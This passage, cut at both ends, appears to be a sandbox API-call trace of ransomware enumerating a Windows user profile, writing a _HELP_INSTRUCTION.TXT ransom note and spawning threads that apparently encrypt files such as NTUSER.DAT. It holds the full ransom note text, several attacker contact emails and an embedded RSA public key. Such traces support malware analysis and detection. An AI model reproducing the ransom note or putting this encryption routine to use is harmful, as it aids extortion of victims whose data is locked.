(lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0226.517] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0226.517] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0226.517] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0 [0226.517] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 1 [0226.518] FindClose (in: hFindFile=0x43728b8 | out: hFindFile=0x43728b8) returned 0 [0226.518] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0226.518] lstrcatW (in: lpString1="C:\\Users", lpString2="\\*.*" | out: lpString1="C:\\Users\\*.*") returned="C:\\Users\\*.*" [0226.518] StrStrW (lpFirst="C:\\Users\\", lpSrch="Desktop") returned 0x0 [0226.518] StrStrW (lpFirst="C:\\Users\\", lpSrch="DESKTOP") returned 0x0 [0226.518] SetErrorMode (uMode=0x1) returned 0x1 [0226.518] wsprintfW (in: param_1=0x17e61c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\_HELP_INSTRUCTION.TXT") returned 30 [0226.518] GetUserNameW (in: lpBuffer=0x17c3f8, pcbBuffer=0x17c1e4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17c1e4) returned 1 [0226.518] wsprintfW (in: param_1=0x17c1f0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0226.518] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17c1ec | out: phkResult=0x17c1ec*=0x1070) returned 0x0 [0226.518] RegQueryValueExW (in: hKey=0x1070, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cb0048, lpcbData=0x17c1e8*=0x104 | out: lpType=0x0, lpData=0x3cb0048*=0x65, lpcbData=0x17c1e8*=0x4a) returned 0x0 [0226.518] RegCloseKey (hKey=0x1070) returned 0x0 [0226.518] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17d61c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0226.518] wsprintfW (in: param_1=0x17c61c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0226.519] CreateFileW (lpFileName="C:\\Users\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1070 [0226.519] CloseHandle (hObject=0x1070) returned 1 [0226.519] FindFirstFileW (in: lpFileName="C:\\Users\\*.*", lpFindFileData=0x17f460 | out: lpFindFileData=0x17f460) returned 0x43728b8 [0226.519] PathFindFileNameW (pszPath="C:\\Users") returned="Users" [0226.519] lstrcpyW (in: lpString1=0x17e824, lpString2="Users" | out: lpString1="Users") returned="Users" [0226.519] lstrcpyW (in: lpString1=0x17f6b0, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users" [0226.519] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0226.519] lstrcatW (in: lpString1="C:\\Users\\", lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0226.519] SetErrorMode (uMode=0x1) returned 0x1 [0226.519] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0226.519] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0226.519] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0226.519] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*" [0226.519] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3cdea18 [0226.519] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0226.519] lstrcpyW (in: lpString1=0x17d784, lpString2="5p5NrGJn0jS HALPmcxz" | out: lpString1="5p5NrGJn0jS HALPmcxz") returned="5p5NrGJn0jS HALPmcxz" [0226.519] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0226.519] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="ntldr") returned 0x0 [0226.519] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="NTLDR") returned 0x0 [0226.520] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0226.520] StrStrW (lpFirst="97978E0428D9BCBB43314AFC2CD2A103.XZZX", lpSrch="ntdetect.com") returned 0x0 [0226.520] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0226.520] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0226.520] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0226.520] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0226.520] lstrcpyW (in: lpString1=0x17dfbc, lpString2="97978E0428D9BCBB43314AFC2CD2A103.XZZX" | out: lpString1="97978E0428D9BCBB43314AFC2CD2A103.XZZX") returned="97978E0428D9BCBB43314AFC2CD2A103.XZZX" [0226.520] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0226.520] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1080 [0226.520] Sleep (dwMilliseconds=0x96) [0226.697] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0226.697] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0226.697] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0226.697] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0226.697] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0226.697] lstrcmpW (lpString1="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX", lpString2="..") returned 1 [0226.697] lstrcmpW (lpString1="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX", lpString2=".") returned 1 [0226.697] StrStrW (lpFirst="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0226.697] StrStrW (lpFirst="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX", lpSrch="ntldr") returned 0x0 [0226.697] StrStrW (lpFirst="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX", lpSrch="NTLDR") returned 0x0 [0226.697] StrStrW (lpFirst="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0226.697] StrStrW (lpFirst="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0226.697] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0226.697] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0226.698] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0226.698] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0226.698] lstrcpyW (in: lpString1=0x17dfbc, lpString2="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX" | out: lpString1="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX") returned="DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX" [0226.698] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0226.698] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1088 [0226.698] Sleep (dwMilliseconds=0x96) [0226.845] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0226.845] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0226.845] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0226.845] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0226.845] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0226.845] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0226.845] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0226.845] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0226.845] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0226.845] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0226.845] lstrcmpW (lpString1="NTUSER.DAT", lpString2="..") returned 1 [0226.845] lstrcmpW (lpString1="NTUSER.DAT", lpString2=".") returned 1 [0226.845] StrStrW (lpFirst="NTUSER.DAT", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0226.845] StrStrW (lpFirst="NTUSER.DAT", lpSrch="ntldr") returned 0x0 [0226.845] StrStrW (lpFirst="NTUSER.DAT", lpSrch="NTLDR") returned 0x0 [0226.845] StrStrW (lpFirst="NTUSER.DAT", lpSrch="NTDETECT.COM") returned 0x0 [0226.845] StrStrW (lpFirst="NTUSER.DAT", lpSrch="ntdetect.com") returned 0x0 [0226.845] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0226.845] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0226.845] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0226.845] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0226.845] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0226.845] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0226.845] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x108c [0226.846] Sleep (dwMilliseconds=0x96) [0227.001] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0227.001] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2="..") returned 1 [0227.001] lstrcmpW (lpString1="ntuser.dat.LOG1", lpString2=".") returned 1 [0227.001] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0227.001] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="ntldr") returned 0x0 [0227.001] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="NTLDR") returned 0x0 [0227.002] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="NTDETECT.COM") returned 0x0 [0227.002] StrStrW (lpFirst="ntuser.dat.LOG1", lpSrch="ntdetect.com") returned 0x0 [0227.002] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0227.002] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0227.002] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0227.002] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0227.002] lstrcpyW (in: lpString1=0x17dfbc, lpString2="ntuser.dat.LOG1" | out: lpString1="ntuser.dat.LOG1") returned="ntuser.dat.LOG1" [0227.002] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0227.002] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1090 [0227.002] Sleep (dwMilliseconds=0x96) [0227.157] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0227.157] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2="..") returned 1 [0227.157] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2=".") returned 1 [0227.157] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0227.157] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="ntldr") returned 0x0 [0227.157] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="NTLDR") returned 0x0 [0227.157] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="NTDETECT.COM") returned 0x0 [0227.157] StrStrW (lpFirst="ntuser.dat.LOG2", lpSrch="ntdetect.com") returned 0x0 [0227.157] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0227.157] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0227.157] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0227.157] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0227.157] lstrcpyW (in: lpString1=0x17dfbc, lpString2="ntuser.dat.LOG2" | out: lpString1="ntuser.dat.LOG2") returned="ntuser.dat.LOG2" [0227.157] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0227.157] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1094 [0227.158] Sleep (dwMilliseconds=0x96) [0227.313] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0227.313] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="..") returned 1 [0227.313] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".") returned 1 [0227.313] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0227.313] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="ntldr") returned 0x0 [0227.313] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="NTLDR") returned 0x0 [0227.313] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="NTDETECT.COM") returned 0x0 [0227.313] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="ntdetect.com") returned 0x0 [0227.313] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="Desktop") returned 0x0 [0227.313] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpSrch="DESKTOP") returned 0x0 [0227.313] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 34 [0227.313] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0227.313] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") 